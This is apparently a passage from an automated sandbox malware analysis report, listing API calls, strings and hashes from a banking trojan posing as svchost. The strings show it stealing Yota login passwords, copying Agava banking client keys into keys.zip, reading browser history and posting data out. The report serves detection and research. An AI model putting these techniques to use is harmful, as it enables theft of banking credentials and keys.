                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92C2C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92C57
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C92C91
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C92C9B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C92CA3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92CB4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C92CBB
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92CC8
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},02C8753A,02C8753B), ref: 02C92CFE
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C92D0F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C92D16
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,02C8753A), ref: 02C92D28
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C92D39
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$P0#v$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
                                                                                                                                                                                                                    • API String ID: 1263884631-1922424858
                                                                                                                                                                                                                    • Opcode ID: 7297fe5ea6fcd3cf08288293d290530811add111bc9e7b35f1f83ff277afdf40
                                                                                                                                                                                                                    • Instruction ID: 93fde4a2732c95acd5d75c4d9674dba764e2e6ed506e508d1241570a2ef67f6d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7297fe5ea6fcd3cf08288293d290530811add111bc9e7b35f1f83ff277afdf40
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D651E031A406596BEF229B349C1CBAA3B9CAF85349F144A94ECC6D7140DF71C648CBA2
                                                                                                                                                                                                                    Function 02C753E0 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 271memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,76232F00,00000000,76230F00), ref: 02C75405
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C7543F
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C7544C
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C7546B
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02C7548C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,02C82665,00000001), ref: 02C7550B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7550E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7551B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7551E
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C75533
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FilePath$FolderProcess$AttributesBackslashCreateDeleteFreeValidate
                                                                                                                                                                                                                    • String ID: \History.IE5\index.dat$\Opera\Opera\global_history.dat$\Opera\Opera\typed_history.xml$http$http$http$links.log
                                                                                                                                                                                                                    • API String ID: 772302041-762728116
                                                                                                                                                                                                                    • Opcode ID: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                                    • Instruction ID: 22586ef335f1538914494fa27962e674e6c067f21e5578ca48d3104f23decb94
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B913B70E40359ABDB22CF60DC84FEABBB9EF44744F844584E945AB180DB70AB45CB90
                                                                                                                                                                                                                    Function 02C86E40 Relevance: 51.1, APIs: 24, Strings: 5, Instructions: 391fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                                    • String ID: %s.DBF$%s.dbf$7f1bf8b2$r+b$rb+
                                                                                                                                                                                                                    • API String ID: 3942648141-3192437867
                                                                                                                                                                                                                    • Opcode ID: 564d86793eb1186b01d6d2885932206889d53179d3c9400a760a3b6f8322c1f8
                                                                                                                                                                                                                    • Instruction ID: ad5fb03736374132df973ddc7ff881cc1540fac488caea9b5d691a9763841805
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 564d86793eb1186b01d6d2885932206889d53179d3c9400a760a3b6f8322c1f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44D11EB19042D55FC7125F3D8C94776BFEAAF86208F2886A8E895C7342E733D609C750
                                                                                                                                                                                                                    Function 02C79B50 Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 275COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: P0#v$open$taskmgr
                                                                                                                                                                                                                    • API String ID: 0-2917657181
                                                                                                                                                                                                                    • Opcode ID: b7e6082617a72ea4ac1b231db91d193152cf0d342a2d59c8e298340c67ce67c6
                                                                                                                                                                                                                    • Instruction ID: c90015fce84a43227881360fce1100c2b29f9ed26db122529d9413665eac2634
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7e6082617a72ea4ac1b231db91d193152cf0d342a2d59c8e298340c67ce67c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B91C431A80284EBD712DF69ED49FABBB7CEBC5711F104B95F90597281C730A961CBA0
                                                                                                                                                                                                                    Function 02C91BA0 Relevance: 51.0, APIs: 17, Strings: 12, Instructions: 273stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                                      • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02C91BC6
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C91BE5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91BF7
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91C08
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02C91C50
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C91C64
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02C91CA4
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C91CB2
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C91CC7
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C91D64
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C91D9D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
                                                                                                                                                                                                                    • String ID: .ini$7f1bf95c$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$UseToken$keys.zip$keys_path.txt
                                                                                                                                                                                                                    • API String ID: 2651364649-292714684
                                                                                                                                                                                                                    • Opcode ID: 571e122fc8df3b38df1a959031803ecffd07d5f7d0d989ff883e76ae471477e2
                                                                                                                                                                                                                    • Instruction ID: 8530997ed578a2fdf82a443dd6cfe597021f2c815232704f86ca57ebae2b196d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 571e122fc8df3b38df1a959031803ecffd07d5f7d0d989ff883e76ae471477e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15A1193194429E8FDF17CB249C5DBEA7BE9EF45300F1846E4E949D7240EBB19A48CB90
                                                                                                                                                                                                                    Function 02C89ED0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 214fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89F18
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bfc59$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v$path.txt
                                                                                                                                                                                                                    • API String ID: 2920098687-2492803057
                                                                                                                                                                                                                    • Opcode ID: dc09b160e95cc9d1a8e2520c945cc2bb42e4f49a67d8cfef1e0e84e47db0705f
                                                                                                                                                                                                                    • Instruction ID: e060a6dc4a62d9af18e8e24f33a177b5cb2f0831524c4b233497ef898910154f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc09b160e95cc9d1a8e2520c945cc2bb42e4f49a67d8cfef1e0e84e47db0705f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74614431A406819FE7165B749C59B7B3BE8AF8974AF188699FC87CB341CB71CA04C790
                                                                                                                                                                                                                    Function 02C89EF8 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89F18
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bfc59$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v$path.txt
                                                                                                                                                                                                                    • API String ID: 2920098687-2492803057
                                                                                                                                                                                                                    • Opcode ID: e195dc1e046f053eb3141a29de2c19dabbddba979bd7578a9c02a843e74f8530
                                                                                                                                                                                                                    • Instruction ID: 058d2e19cc3ae5a7eb33f0f5158297650a9a262ff920cb78621d39c29839aa8a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e195dc1e046f053eb3141a29de2c19dabbddba979bd7578a9c02a843e74f8530
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52615831A402919BE7165B749C59B7B3BE8AF8A74AF188599FC87C7341CB31CD05C790
                                                                                                                                                                                                                    Function 02C906E0 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 225fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C906FE
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C9073F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841), ref: 02C9077B
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,7f1bf841), ref: 02C90790
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C9079A
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C907A2
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C907B3
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C907BA
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C907F2
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C907FF
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf841,?,?), ref: 02C90847
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$Backslash$ErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                    • String ID: 7f1bf841$keys.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 1668326001-3963007484
                                                                                                                                                                                                                    • Opcode ID: 061c459f3358f74cae1d51bf583356a7047ce1b8a08023aa8d9ec97b01a96b21
                                                                                                                                                                                                                    • Instruction ID: b2282085784792c57ea597b4e053d02bf983241986ebfcbaf99e989dbca682b6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 061c459f3358f74cae1d51bf583356a7047ce1b8a08023aa8d9ec97b01a96b21
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E714731A402999FEB128B349C5CBAB7BE8EF85704F144AD4E985DB241DF71CA49CF90
                                                                                                                                                                                                                    Function 02C8EB60 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 215COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8EB7E
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFDA3), ref: 02C8EBAB
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8EBED
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8EBF3
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8EBFB
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8EC0C
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8EC13
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFDA3,?,?), ref: 02C8EC87
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02C8ECC5
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashCreateDirectoryErrorLast$AdminFolderMakeSystemUsermemset
                                                                                                                                                                                                                    • String ID: 7F1BFDA3$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0#v$path.txt
                                                                                                                                                                                                                    • API String ID: 2217318736-2109808429
                                                                                                                                                                                                                    • Opcode ID: 58c15778cd57061d1bf4c3995e2303941722763288b21a53f60d0d2a0ae54a50
                                                                                                                                                                                                                    • Instruction ID: 2ed45fa89f3537049a4328ad7dd3c48984d289ba92d9bddbc3343abe1d9e4ec7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58c15778cd57061d1bf4c3995e2303941722763288b21a53f60d0d2a0ae54a50
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F57127319006955FDB129B349C58BEB7BE8AF85308F14CA95FD86CB241EB70DA49CB90
                                                                                                                                                                                                                    Function 02C842C0 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 182memorysleepthreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                                      • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C842E1
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C842F6
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                                      • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 02C84315
                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 02C8432C
                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C84344
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843AC
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C843AF
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843BC
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C843BF
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 02C8440E
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(000002A0,00000000), ref: 02C84438
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTerminateThreadTickValidateValue_snprintf
                                                                                                                                                                                                                    • String ID: 80F503A7a$C:\Windows\apppatch\svchost.exe$id=1&post=%u
                                                                                                                                                                                                                    • API String ID: 3337567932-3078109131
                                                                                                                                                                                                                    • Opcode ID: e2e9da4f6c5ab10f68bee24fd1a57cdc281e0e90e6a58f9f9bc6091db8cea263
                                                                                                                                                                                                                    • Instruction ID: bbd2204ae303518fbca62e2b7ffa70cbcb0041e8f9508d5356b3ba8fd619da67
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e9da4f6c5ab10f68bee24fd1a57cdc281e0e90e6a58f9f9bc6091db8cea263
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4513B71E802466BE735ABB0AC49FBA7B6DDF84B08F048694F609D71C1EB70D504CB60
                                                                                                                                                                                                                    Function 02C800B0 Relevance: 45.6, APIs: 14, Strings: 12, Instructions: 137libraryloadermemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7622F550,00000000), ref: 02C800CE
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02C800E4
